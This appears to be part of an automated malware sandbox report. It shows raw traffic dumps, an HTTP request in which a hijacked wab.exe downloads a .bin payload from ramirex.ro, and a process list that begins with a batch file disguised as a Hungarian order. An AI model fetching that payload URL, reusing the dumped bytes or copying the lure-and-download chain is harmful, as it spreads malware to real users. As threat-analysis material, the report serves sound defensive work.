                              Data Ascii: ksPoqfynsnijiTNcVlyPFJVhmssiKDCsa+tW+MFbd8mrzC50KQUzyCIhpBcZ9NKTy3eQOA7Rya752yYFVRxikDCC7sG7ih4AOUwMkc7CGJm2HVWGPio7DOXdYOTIygyviBKk1j8dY+SgtRWm23MpIfJL6Pgy5X8EAJYJLQ/oJ6YU4tnFISlH/Bo9eeuhC03koB1jYR7W44WznFfAHKb6ESEpR5PO76S0GLkZ4dko95GqKWY0Ue3RsjyUhe2mgOc
                              2024-05-31 06:09:45 UTC16384INData Raw: 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 4b 2f 61 56 47 32 67 48 57 50 6b 41 76 67 33 6c 30 4b 37 2f 42 6e 58 56 57 37 4f 31 52 78 37 4c 45 34 54 56 6d 67 61 51 6e 71 45 41 6d 45 30 2b 32 41 68 56 4f 33 68 30 5a 42 69 50 52 33 79 50 41 36 47 4b 72 71 51 64 2b 2b 69 62 70 54 75 78 36 49 64 59 31 30 2b 4a 48 74 6e 38 4b 56 52 2f 71 62 4f 5a 68 33 6e 4f 6d 2f 4a 31 45 70 4f 4f 79 6b 74 36 6f 34 52 31 79 5a
                              Data Ascii: KAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKK/aVG2gHWPkAvg3l0K7/BnXVW7O1Rx7LE4TVmgaQnqEAmE0+2AhVO3h0ZBiPR3yPA6GKrqQd++ibpTux6IdY10+JHtn8KVR/qbOZh3nOm/J1EpOOykt6o4R1yZ
                              2024-05-31 06:09:45 UTC16384INData Raw: 6f 52 31 6a 71 61 44 63 64 6d 55 56 6e 6d 4c 6b 6f 43 5a 30 53 51 6b 6b 75 6d 46 69 6e 4f 5a 6e 6f 52 31 6a 30 51 77 73 46 61 64 66 6b 4f 44 6c 6f 42 30 57 45 79 46 67 48 38 61 59 48 57 50 72 4c 34 57 33 47 31 39 65 35 77 46 6e 48 69 4a 6e 68 37 77 46 33 58 69 63 55 4e 61 73 6d 75 70 67 54 5a 78 67 48 77 35 6d 70 32 42 67 6e 45 6a 48 77 30 4f 43 49 79 58 69 59 75 53 67 4f 41 2b 75 66 35 69 69 5a 52 58 69 59 75 53 67 4a 54 4b 35 4f 35 6d 68 5a 52 58 69 59 75 53 67 53 48 44 4f 4f 35 7a 57 47 36 45 64 59 36 2b 4f 49 4c 79 43 49 65 51 76 6f 73 59 6b 73 71 64 66 6b 4a 7a 6c 6f 42 30 57 45 4f 4e 37 35 69 52 6e 48 6d 35 42 54 39 63 46 45 32 46 51 2f 6d 57 54 61 55 34 32 57 43 57 67 5a 5a 50 53 37 73 47 34 6e 46 43 38 57 32 76 4e 59 48 75 63 6f 45 51 34 47 57 74
                              Data Ascii: oR1jqaDcdmUVnmLkoCZ0SQkkumFinOZnoR1j0QwsFadfkODloB0WEyFgH8aYHWPrL4W3G19e5wFnHiJnh7wF3XicUNasmupgTZxgHw5mp2BgnEjHw0OCIyXiYuSgOA+uf5iiZRXiYuSgJTK5O5mhZRXiYuSgSHDOO5zWG6EdY6+OILyCIeQvosYksqdfkJzloB0WEON75iRnHm5BT9cFE2FQ/mWTaU42WCWgZZPS7sG4nFC8W2vNYHucoEQ4GWt
                              2024-05-31 06:09:45 UTC16384INData Raw: 77 4a 79 51 77 46 6a 4b 33 42 4a 6a 69 4f 49 58 34 47 65 76 4d 69 48 32 4b 65 4f 62 6b 6d 49 2b 4b 34 44 64 35 61 41 64 35 77 46 6e 48 2f 58 63 65 75 50 69 31 6f 79 67 54 4a 67 6b 31 2b 4c 57 51 6c 79 64 65 53 45 76 6a 6d 59 4a 6c 2b 70 5a 55 42 78 6a 35 43 44 68 51 46 73 38 36 41 36 62 6d 4d 66 69 45 7a 58 61 4f 58 38 6b 33 75 49 54 6a 56 63 37 42 79 48 61 67 32 4d 77 35 57 49 65 4b 36 43 54 35 61 41 64 35 78 4a 6e 48 35 34 77 75 4f 54 6a 48 2f 31 37 57 6a 63 68 4c 79 7a 5a 36 7a 50 69 35 69 39 48 64 67 38 68 4c 38 6f 46 4c 6c 31 62 4a 32 65 59 65 75 61 67 48 57 59 72 72 55 72 6d 50 79 47 6f 65 75 61 67 48 5a 6a 43 71 38 76 69 55 62 6b 66 59 2b 51 45 70 7a 46 67 78 70 69 77 5a 51 30 45 59 65 53 67 53 6a 43 77 70 5a 77 65 6c 41 71 34 59 2b 53 76 6b 4c 69
                              Data Ascii: wJyQwFjK3BJjiOIX4GevMiH2KeObkmI+K4Dd5aAd5wFnH/XceuPi1oygTJgk1+LWQlydeSEvjmYJl+pZUBxj5CDhQFs86A6bmMfiEzXaOX8k3uITjVc7ByHag2Mw5WIeK6CT5aAd5xJnH54wuOTjH/17WjchLyzZ6zPi5i9Hdg8hL8oFLl1bJ2eYeuagHWYrrUrmPyGoeuagHZjCq8viUbkfY+QEpzFgxpiwZQ0EYeSgSjCwpZwelAq4Y+SvkLi
                              2024-05-31 06:09:45 UTC16384INData Raw: 30 32 6b 7a 53 63 4f 68 71 54 49 69 76 4c 44 69 48 44 42 48 54 30 67 53 56 2b 65 67 30 56 4f 44 6f 37 58 48 64 31 71 32 41 2f 73 6f 6c 48 36 4d 4d 74 4a 75 71 72 34 58 64 6e 6c 44 34 4d 7a 44 69 35 74 6c 42 74 53 55 35 6f 53 69 48 57 4e 63 77 71 32 79 41 57 77 52 54 58 61 4c 56 32 6d 36 44 68 44 58 61 7a 69 4f 57 64 41 38 69 39 42 30 47 74 6a 31 6f 48 56 49 4f 41 36 44 49 50 30 43 49 2b 4e 45 79 54 41 6f 4a 59 49 37 6b 7a 56 61 37 42 6c 45 72 53 48 62 4f 4a 73 36 42 2b 49 53 59 63 49 4a 32 43 48 7a 38 72 77 4c 51 75 72 53 6a 66 2f 77 4f 6f 57 38 39 67 4f 38 79 55 76 4f 44 5a 53 43 70 76 6c 69 54 48 30 52 41 4e 56 61 72 63 65 59 75 50 34 59 77 56 69 6b 72 6d 62 65 7a 61 32 43 33 53 56 39 59 65 53 67 6c 75 61 45 6f 68 31 6a 36 79 58 48 6d 42 74 66 6c 75 7a
                              Data Ascii: 02kzScOhqTIivLDiHDBHT0gSV+eg0VODo7XHd1q2A/solH6MMtJuqr4XdnlD4MzDi5tlBtSU5oSiHWNcwq2yAWwRTXaLV2m6DhDXaziOWdA8i9B0Gtj1oHVIOA6DIP0CI+NEyTAoJYI7kzVa7BlErSHbOJs6B+ISYcIJ2CHz8rwLQurSjf/wOoW89gO8yUvODZSCpvliTH0RANVarceYuP4YwVikrmbeza2C3SV9YeSgluaEoh1j6yXHmBtfluz
                              2024-05-31 06:09:45 UTC16384INData Raw: 45 66 51 36 67 70 6e 56 49 68 73 74 34 47 4c 6b 6f 47 69 55 70 53 54 55 70 4f 57 51 30 71 2f 52 78 70 69 6a 5a 5a 47 6b 4e 7a 76 74 6d 62 74 6c 6b 53 7a 4c 32 4f 57 63 55 73 4d 41 79 67 77 53 59 55 45 46 33 57 71 55 2f 6f 61 69 48 57 4e 66 74 43 76 54 4d 53 48 75 75 64 39 44 6f 6c 73 51 49 65 35 59 73 69 31 32 35 78 67 68 39 70 4b 2f 66 68 7a 6e 41 4a 6a 70 59 6a 30 72 67 41 48 6d 6f 42 31 62 50 5a 6a 66 70 4f 57 47 51 4f 49 51 78 69 53 37 5a 59 6d 57 6e 69 65 69 36 36 65 74 49 53 79 62 65 59 46 49 57 7a 51 68 4c 50 48 76 43 57 43 6b 59 56 63 63 59 2b 51 47 58 48 31 31 49 65 59 4f 35 59 74 4b 34 70 6e 55 36 6e 6e 6b 6f 42 4c 73 68 2f 66 69 6e 47 55 56 36 6d 4c 6b 6f 43 36 6a 41 30 57 63 7a 68 4f 68 48 57 4f 6c 45 37 39 65 5a 52 32 78 59 2b 53 67 38 47 50
                              Data Ascii: EfQ6gpnVIhst4GLkoGiUpSTUpOWQ0q/RxpijZZGkNzvtmbtlkSzL2OWcUsMAygwSYUEF3WqU/oaiHWNftCvTMSHuud9DolsQIe5Ysi125xgh9pK/fhznAJjpYj0rgAHmoB1bPZjfpOWGQOIQxiS7ZYmWniei66etISybeYFIWzQhLPHvCWCkYVccY+QGXH11IeYO5YtK4pnU6nnkoBLsh/finGUV6mLkoC6jA0WczhOhHWOlE79eZR2xY+Sg8GP
                              2024-05-31 06:09:45 UTC16384INData Raw: 5a 68 75 59 41 45 36 55 62 62 72 6a 4a 47 32 6e 47 72 78 65 4e 70 59 66 6a 68 74 36 48 64 74 49 62 5a 73 78 48 55 58 74 6a 55 42 64 71 49 74 74 58 6e 74 6a 55 4a 79 54 61 48 46 55 33 6c 57 36 38 36 59 66 58 53 68 55 34 68 66 45 49 62 6c 38 49 64 37 65 6d 6e 77 34 34 69 65 4c 34 4c 50 73 38 49 48 71 42 4b 45 46 2f 6f 49 6c 31 52 50 75 4c 75 54 48 78 35 55 39 38 6a 61 55 65 35 6b 33 4c 49 4c 76 59 76 44 67 48 45 76 70 72 4f 68 72 49 57 41 66 58 4d 6b 64 59 2b 73 6b 53 58 63 62 58 30 55 46 59 57 42 47 34 41 75 41 6c 50 34 6f 6f 52 31 6a 4b 4d 73 48 74 72 7a 33 38 2f 70 45 2b 75 66 53 56 74 39 6d 43 37 69 4a 4a 49 59 73 38 32 6d 32 37 79 53 73 34 61 67 55 53 69 71 51 50 75 4f 75 37 38 41 63 61 57 63 55 51 65 6f 66 38 39 45 77 39 67 34 30 6a 45 62 68 69 4a 6b
                              Data Ascii: ZhuYAE6UbbrjJG2nGrxeNpYfjht6HdtIbZsxHUXtjUBdqIttXntjUJyTaHFU3lW686YfXShU4hfEIbl8Id7emnw44ieL4LPs8IHqBKEF/oIl1RPuLuTHx5U98jaUe5k3LILvYvDgHEvprOhrIWAfXMkdY+skSXcbX0UFYWBG4AuAlP4ooR1jKMsHtrz38/pE+ufSVt9mC7iJJIYs82m27ySs4agUSiqQPuOu78AcaWcUQeof89Ew9g40jEbhiJk
                              2024-05-31 06:09:45 UTC16384INData Raw: 7a 71 57 79 2f 51 34 2b 4d 6c 30 71 33 43 6d 69 49 65 7a 31 4c 71 46 32 34 67 32 79 6f 4a 4c 45 49 65 79 6e 46 2f 6b 52 36 76 32 72 63 2b 46 79 59 71 76 4e 75 62 6f 41 67 71 52 49 49 32 47 54 63 4e 52 51 45 51 63 77 68 6e 49 77 55 74 55 68 6f 36 6f 58 71 4b 70 79 66 4c 33 49 62 4a 51 52 37 68 4a 69 38 49 51 64 59 2b 53 67 76 4e 68 4e 71 52 73 63 72 63 2b 42 49 63 58 55 41 5a 37 39 6d 56 34 79 55 57 61 65 45 6c 42 63 34 35 34 65 2b 77 42 70 44 59 49 55 4b 57 57 6b 4f 62 77 48 65 2b 62 69 30 49 52 53 6f 41 38 44 53 39 32 53 31 43 49 43 5a 56 5a 79 2f 49 77 74 6e 4a 56 6d 63 35 79 6d 5a 57 5a 49 4f 38 35 32 6c 47 33 73 66 62 78 67 6b 42 79 69 6e 72 6d 48 75 43 59 33 65 4b 6a 4d 6d 66 35 30 2f 67 4f 7a 47 44 43 30 46 6e 56 38 4a 37 31 5a 6b 56 59 73 76 72 42
                              Data Ascii: zqWy/Q4+Ml0q3CmiIez1LqF24g2yoJLEIeynF/kR6v2rc+FyYqvNuboAgqRII2GTcNRQEQcwhnIwUtUho6oXqKpyfL3IbJQR7hJi8IQdY+SgvNhNqRscrc+BIcXUAZ79mV4yUWaeElBc454e+wBpDYIUKWWkObwHe+bi0IRSoA8DS92S1CICZVZy/IwtnJVmc5ymZWZIO852lG3sfbxgkByinrmHuCY3eKjMmf50/gOzGDC0FnV8J71ZkVYsvrB


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.651555188.215.50.154433640C:\Program Files (x86)\Windows Mail\wab.exe
                              TimestampBytes transferredDirectionData
                              2024-05-31 06:10:16 UTC179OUTGET /HtwvlcDSFcrAhhcHdD97.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: ramirex.ro
                              Cache-Control: no-cache
                              2024-05-31 06:10:16 UTC356INHTTP/1.1 200 OK
                              Date: Fri, 31 May 2024 06:10:16 GMT
                              Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_qos/11.5 mod_fcgid/2.3.9
                              Last-Modified: Sun, 26 May 2024 15:08:50 GMT
                              ETag: "266009d-41e40-6195cc739c2e3"
                              Accept-Ranges: bytes
                              Content-Length: 269888
                              Connection: close
                              Content-Type: application/octet-stream
                              2024-05-31 06:10:16 UTC16384INData Raw: d3 e4 33 04 22 db ea f4 63 06 a8 76 1e a7 3a 8b 71 b0 be b1 c2 b6 21 14 45 87 5e ed 8f a5 b5 8d 84 59 79 09 67 82 8a 89 a7 ac 15 7a 11 c7 2a 02 3a 3f 46 03 3a 54 3f a6 29 41 c1 24 d5 75 6b 7c 78 23 d3 01 7d 55 c1 3c 77 90 cb f2 cb 87 5b fd b9 c7 2a 73 0c ee 49 cc 24 d6 25 0a 12 8c b0 07 34 70 b8 50 0d 9d 4a 63 6e da cc a3 09 8f 7f f1 a3 47 61 1e 5e 3e cb 01 c0 0d e8 a6 23 a1 d2 42 7c 3f 29 4e 5f 3c 64 9b c1 80 e5 13 26 74 76 d1 fa e6 c9 cf af 0c 33 43 d9 af 51 2b 17 e0 72 92 29 3e db 22 6e 96 7f a2 54 20 18 89 e4 46 34 d3 84 53 f8 50 67 79 72 6c b5 34 76 fd 76 a2 82 ca 1d a8 67 e6 94 1d 1d b9 16 1c 45 c1 c0 ee 7e 83 d5 bf d6 be ae dd cc b9 b1 db 68 3e 2c b3 e2 19 f3 b2 75 40 ea d7 62 8c 06 28 d7 f2 a0 33 03 a4 43 8e 03 8f 6a ec 66 02 d7 43 15 d8 47 f7 dc
                              Data Ascii: 3"cv:q!E^Yygz*:?F:T?)A$uk|x#}U<w[*sI$%4pPJcnGa^>#B|?)N_<d&tv3CQ+r)>"nT F4SPgyrl4vvgE~h>,u@b(3CjfCG
                              2024-05-31 06:10:16 UTC16384INData Raw: 83 52 5d e1 29 44 82 a2 a3 69 b1 4e 59 c9 05 7e f1 83 8d 38 8a 36 0f 32 21 23 ab da 0a ec 83 2e 90 ee bc c4 33 75 04 f3 f1 1b fd 0b fa 69 c9 96 4f a2 4b 91 23 0a eb 99 d2 a4 b2 fd 2e dc 79 45 cb e1 27 74 af a4 58 d0 75 e0 70 3b 16 76 f5 bc db ed fe 44 1d f9 f1 8d c5 bb 61 da 3b fa 51 0f ce 74 05 7a bb 4c 8a 5e e3 2c 50 6b 46 e3 3b b3 ab 31 07 4c 78 1b bc d9 c0 b0 9f 0a 9b a4 68 ac 7c 91 38 8f 26 a0 8b bf 77 eb 42 47 8a 63 80 77 f4 89 83 66 3f d5 74 6f 1c 67 2b cf 52 0b 88 91 b9 ea bf 09 09 56 4c 80 0b f7 40 43 05 6b b3 14 89 bb 03 32 8e 38 84 bc 5a e0 9f 02 3e 2a 31 78 4b 0d 78 33 ac e9 6d 89 af a6 0f 59 6d 07 8e 03 7b 60 f0 27 84 74 71 40 e2 e0 0b 7d 13 c8 db c5 e5 53 45 01 55 94 14 1d aa 2d f2 e7 a3 f7 92 3b 63 ad 8d 52 fa 64 fe 42 87 98 d5 90 fb a1 8e
                              Data Ascii: R])DiNY~862!#.3uiOK#.yE'tXup;vDa;QtzL^,PkF;1Lxh|8&wBGcwf?tog+RVL@Ck28Z>*1xKx3mYm{`'tq@}SEU-;cRdB
                              2024-05-31 06:10:16 UTC16384INData Raw: ea 7e 17 74 08 f0 df 16 67 56 25 5a c4 b5 5d d3 03 c9 b8 69 e5 76 f4 51 86 1b 3d 36 b2 49 ef 77 12 77 33 3f 02 36 74 7d 43 3a 3c 0c d9 70 27 b9 ef 28 59 3a e2 7e 4a 55 80 c1 d2 ff 85 10 3a 07 a8 cc d8 2c ce 22 af 86 e9 b0 7d 68 9a 92 f5 89 98 90 81 46 0e 28 51 c9 aa ad 16 63 8b 42 06 bc 02 c5 1e a1 6a 9f 91 de 58 26 e6 08 f4 ed 3c 7d 8c 93 08 46 f5 3d 7b 92 67 31 b8 9f 4a 34 2a 46 5c 06 56 e5 21 6f af f3 1e 36 33 6c d0 b7 56 9c 0a 87 b5 5c 39 9d ee 29 95 23 d0 07 b2 b0 b8 a5 46 79 6a 7d 6e fd 7a c7 be 6a f5 59 dc 2d 85 e4 7d 48 67 11 b0 1f c8 16 fa fb 07 ec 6a f7 75 60 6d 5c cf 70 43 8b 6b 4c 1d 4b ba aa e5 fb 52 89 0f ab 5b 76 73 1f 0f 11 8a 2b d7 a4 1f f7 96 2c 1a 44 d7 a8 2a 05 72 9e 03 98 db f2 57 4e 6e d9 cf 4a 82 75 66 09 03 cb ee 14 42 f4 1a 76 c7
                              Data Ascii: ~tgV%Z]ivQ=6Iww3?6t}C:<p'(Y:~JU:,"}hF(QcBjX&<}F={g1J4*F\V!o63lV\9)#Fyj}nzjY-}Hgju`m\pCkLKR[vs+,D*rWNnJufBv
                              2024-05-31 06:10:16 UTC16384INData Raw: a3 e0 d2 9a 68 40 93 c3 da 2a 13 0c 57 a9 cf 85 8a 14 09 bf 68 9f 98 ce 28 f5 f7 ed b1 43 da 6c 05 1b 21 69 02 7e ed 9d 0f fd 22 ae 71 b9 96 0a 0c ce d0 92 54 60 07 0a 35 36 c4 18 0e bc 5f f0 74 c3 95 a5 2d ab 3f 2c d7 62 db 2c 84 43 9b dd 8b 9c cd d8 5e 08 51 66 40 7a 26 b6 81 5f 70 fa 18 70 7a 4a ee d3 54 3e cd e2 cf 30 26 7e 2a df b5 d7 50 1d c5 c1 fc 40 24 a7 23 dc 30 95 fc fe 0b 27 8b aa a7 9c 37 33 13 a2 53 37 68 ab ca 20 87 67 a8 1d 95 ce 2e be 4e 78 20 d3 3d d1 38 93 a1 9e a2 f3 61 8d a6 3e 15 4e 13 ca 7f 59 84 38 84 da c8 01 93 48 3e 83 d5 f5 64 80 35 82 48 9b d1 31 2f f3 f8 be 75 7d a6 dd ab b8 5d 9f 7b c9 f6 92 cc 54 f2 dd 6b d5 6e 70 7a 3a ea 6c bf 48 a0 ea d9 ef dc 0b 73 4b eb b3 3e a4 d6 24 ee 62 a7 c5 69 36 58 44 39 ff ca f3 39 33 a3 bc c5
                              Data Ascii: h@*Wh(Cl!i~"qT`56_t-?,b,C^Qf@z&_ppzJT>0&~*P@$#0'73S7h g.Nx =8a>NY8H>d5H1/u}]{Tknpz:lHsK>$bi6XD993
                              2024-05-31 06:10:16 UTC16384INData Raw: 4f 89 d4 f3 03 bd 1f 12 09 05 81 08 fb 9c 4b a5 c7 c0 24 29 75 05 75 8f 4f db fb 03 1e bd 28 1e 32 f3 07 c0 cb ca 9d e8 7f 43 1f 48 11 1e 67 1b 00 00 3b e3 62 50 27 0c 3d a7 7c bc 3e 8a 3d be 16 f3 a3 19 0b e3 58 e0 c7 99 6f 5a 34 6a c0 0e e3 e4 95 66 8e e4 6b 5e 9f 5f d1 0a 93 c9 6f 88 18 22 7f 39 24 64 91 d5 5f 08 50 0b 01 e4 70 da 80 d1 27 e2 2c 17 8f d9 9a 50 ea 9a ef dc 72 53 97 8f 92 c5 07 d5 71 39 0b c5 60 91 20 c5 d3 d9 4a cb 4c 91 07 42 85 0a 6c 95 c9 4c ec f7 07 6c 60 d9 67 53 67 4a 7a 5c 8f ed 9c ed a7 89 cc 78 d4 d1 06 82 c5 7f 44 8f 5f 89 b4 6f 60 d8 d1 26 cb 0f f4 2a 85 ae 94 68 99 9a e7 f0 84 a2 b3 81 fc ac a5 01 a4 d6 30 e9 d3 c5 70 e2 2a 15 e9 96 9b f3 bd 0b ad 0c 14 b9 f5 e3 eb 77 d3 8f d3 6b c6 96 c8 e9 0f 6f 21 09 d8 35 69 3f a8 bc f4
                              Data Ascii: OK$)uuO(2CHg;bP'=|>=XoZ4jfk^_o"9$d_Pp',PrSq9` JLBlLl`gSgJz\xD_o`&*h0p*wko!5i?
                              2024-05-31 06:10:16 UTC16384INData Raw: 69 32 6f e9 22 5d 04 d0 64 f8 38 7c 30 77 fe 0f a8 2e 5a 04 99 05 f1 06 55 cf eb 40 6f d5 41 b5 9b 60 a2 7d 0f 79 ad 42 7d 9f 84 37 4a 5a af cb f4 dc 76 fc 64 23 97 cc 8d d3 e3 5d 35 4f 2c b2 dd 85 a0 53 f3 35 c4 ab 3d ca 79 8c 1e ed a9 07 51 20 c0 c2 83 ee 39 6c 90 b8 e0 94 b3 95 32 72 88 77 26 af 5f e6 94 a1 c0 5a 7d 8b 73 1e af 01 e7 a5 eb 29 5b 3e bc c9 9b 1e 62 3e ad 27 8b 7a f2 d3 48 fd f6 87 bb dc d8 73 86 59 b1 69 b0 26 37 be e7 6d e9 ae 58 7b d1 aa 9e 71 00 d7 7c 19 69 c8 15 4b 03 6e ab df 54 b7 4a 3f 95 cf 03 53 2c a0 59 52 63 d1 82 f8 66 c5 2c c1 1c b7 af e6 6c 4e e5 9f 04 11 8e 3a 48 41 6a e3 77 c5 9e 2c 28 a6 39 24 46 3e 07 5b ad 11 5d cd d4 33 b2 3d 0c e1 42 6b 34 fe 87 81 ea f8 64 e8 e5 cb 53 38 0d 07 f1 b5 1e 1e c1 fa 35 c9 0c 8f 23 7d a5
                              Data Ascii: i2o"]d8|0w.ZU@oA`}yB}7JZvd#]5O,S5=yQ 9l2rw&_Z}s)[>b>'zHsYi&7mX{q|iKnTJ?S,YRcf,lN:HAjw,(9$F>[]3=Bk4dS85#}
                              2024-05-31 06:10:16 UTC16384INData Raw: 18 76 4c 21 26 b5 eb 68 e5 db b3 0b 5f 8b 8c d4 ef a5 8a 3d d0 68 ae 7d 9c 16 7b 06 f2 74 b2 9c bb 4b 1d 15 54 3f 8b 86 de c1 d3 dd e8 76 aa b7 dd c8 2b 4a 57 4c 3a 1b 09 36 f6 69 bf 15 96 25 32 87 9f 8c 77 ae 97 de 95 2a f0 9a a6 f7 9a 1f 6e c9 ef fa 75 c5 4d 54 2b e6 4b 4e 2d 5d c3 f1 d5 cb c4 7a 6f fb d6 7a 97 4e 50 fa d9 37 df 97 33 5f 6d b1 a8 0c 29 7f 24 07 72 5a 3f be 45 27 c8 b9 22 e7 02 d3 7b 50 5f e6 fd b9 03 44 d7 9c f8 37 03 e0 c2 8b ab ae c3 99 24 7a d7 f0 8e 14 69 85 11 00 e8 26 62 45 e0 cd 42 a4 c1 7b 54 41 34 99 b1 92 18 1e a6 2a 14 fa aa 0a 27 bd a6 bd 4c 1b a7 57 37 0c 1c 01 ec 30 97 9d 99 9b f3 24 b0 4e a8 a1 f6 95 e5 c3 5e e4 64 d4 1f 7f 87 a9 a0 9d 69 82 f6 3c d5 19 46 c3 da 7d e0 87 99 2a 4d 17 7e a1 da 86 dd ec 05 22 06 8f 49 7c a2
                              Data Ascii: vL!&h_=h}{tKT?v+JWL:6i%2w*nuMT+KN-]zozNP73_m)$rZ?E'"{P_D7$zi&bEB{TA4*'LW70$N^di<F}*M~"I|
                              2024-05-31 06:10:17 UTC16384INData Raw: 76 62 56 00 e3 cc 13 54 da 27 96 7e 54 ab 44 83 57 ce ba b3 14 54 f6 0a cb dc c1 39 7f c6 b7 a2 6b af ed aa ac 9c 72 1b 71 7b 2a c8 04 78 ec 5d e3 66 ba 46 b6 56 e2 e3 77 9b ab d3 b3 62 ad 6d c5 06 19 5d d8 9d 19 03 9c d6 88 53 af d4 5a 8b ec b4 31 c7 2a a6 2e 6f 9f d9 5d 34 6f 6d 26 ce f8 ff 8a 04 56 9b a5 13 64 7d 67 65 e6 2f 0a 02 8d 6e 53 51 c7 b7 56 72 d3 6d 80 ee 37 2a 7f 50 33 e7 1c 89 36 d3 9f 1e c2 82 ff e2 ad 27 61 6f 93 f7 fe ea 41 16 da 31 12 62 21 ee 79 ba de cb 78 99 93 88 41 73 21 aa 5c 31 ec f8 20 44 fc bf 7f ab dd 83 2e 84 44 4f c7 78 86 ff a9 23 a1 61 fa 32 f6 13 65 b8 e9 1f b2 b9 a9 48 c6 95 3b 3f 09 1c ae 36 8d 99 23 b3 0d 2d ef 0b 50 56 47 66 a5 aa a0 e7 d3 1c 8a a2 53 4b 58 a9 0c b6 99 35 70 b4 26 19 24 5e be 67 14 40 5b 34 b0 5b 74
                              Data Ascii: vbVT'~TDWT9krq{*x]fFVwbm]SZ1*.o]4om&Vd}ge/nSQVrm7*P36'aoA1b!yxAs!\1 D.DOx#a2eH;?6#-PVGfSKX5p&$^g@[4[t
                              2024-05-31 06:10:17 UTC16384INData Raw: 88 54 8f 92 a7 0c 3b cf 6b 4e 06 22 c3 47 cb 00 38 4c a1 83 89 57 aa ab 74 e5 9c 40 52 ad dd 78 47 18 12 1d dd 0a 77 4b 44 5a d4 d7 06 58 88 db 70 03 04 d2 47 9d 81 49 35 e5 68 73 e9 83 e6 91 dc ba 22 23 b3 2a cb ed 10 a3 db 06 7c 00 a7 d4 9f 6a 1d 70 d5 6e 00 1b 15 54 8a 65 b5 a4 67 1b 1c 16 57 71 06 f2 ba 55 e4 5d ea 6b dd 2b 57 df aa 9f e4 d6 ff d6 fa 9f 04 35 2e e9 3d bf 99 ff 08 56 7b d5 f4 ed ec e8 ce 5d 8f cf 63 1e fa 7b fc 7f da c3 d0 76 e0 51 51 bc df fe 20 0b 1f 5d e5 07 9c 2c be 32 3c d7 86 24 a2 1a b2 b4 d9 45 79 8d f8 55 76 0a 2f e9 61 e1 4a 19 d9 1a 87 fc 2c 9c dd c6 e2 47 84 43 1c 95 3d 43 ea 7b b3 27 16 7d 16 8d 19 be 51 f9 4c 7a 3b 8e d0 44 ae 85 67 53 96 85 50 fe ed fd ba 56 df 67 43 97 9f 5a d3 21 4a 71 ac 89 4c 02 f5 96 08 65 fb 2a 54
                              Data Ascii: T;kN"G8LWt@RxGwKDZXpGI5hs"#*|jpnTegWqU]k+W5.=V{]c{vQQ ],2<$EyUv/aJ,GC=C{'}QLz;DgSPVgCZ!JqLe*T
                              2024-05-31 06:10:17 UTC16384INData Raw: 9d f4 63 45 38 78 ba 29 cd b5 4a f9 10 7b 53 f1 74 39 1d 79 ff 62 95 49 42 53 26 e9 22 07 32 54 f5 75 f5 96 82 81 b1 85 aa 8c 89 a4 4e 78 24 2d 5f b1 df 00 95 39 0f c6 ba ac 5f 03 c7 31 65 5d 4a ec c2 ca 7b 7a 8e 9e 8e d6 71 eb c3 85 ff da a1 c6 81 66 5a 25 c5 1c 63 02 48 4d ed 8e 33 52 59 e0 06 b4 59 b2 b7 bd 29 37 6f bf 6e 24 b3 9f 85 21 bd 84 c1 14 ee cc a6 fb 20 ac 8e 78 60 48 1f c5 02 ad 00 10 25 ac 53 f1 47 46 76 cf 3b cb 1c f6 70 81 90 27 36 8a 55 16 2b 81 06 8f 06 da 44 56 0e 78 0a 78 66 dd c5 fd f3 a5 b6 6c e1 9b db 6d d0 85 48 33 f6 f3 62 92 79 ba b3 8c 1d 9c f8 1b ca 6d 89 78 9b 51 9f fd e2 4f 01 36 ea 03 f4 11 37 f9 42 1f 16 cb 8d 6c 92 64 da 71 4b ec cb 4e 75 4f 7c 1d 68 10 5f d7 2c 81 0c d9 37 f0 0b 25 33 85 e3 cd fe 8b bb f6 59 bd 33 7c 68
                              Data Ascii: cE8x)J{St9ybIBS&"2TuNx$-_9_1e]J{zqfZ%cHM3RYY)7on$! x`H%SGFv;p'6U+DVxxflmH3bymxQO67BldqKNuO|h_,7%3Y3|h


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:02:09:01
                              Start date:31/05/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.bat" "
                              Imagebase:0x7ff7458b0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:2
                              Start time:02:09:01
                              Start date:31/05/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:3
                              Start time:02:09:01
                              Start date:31/05/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
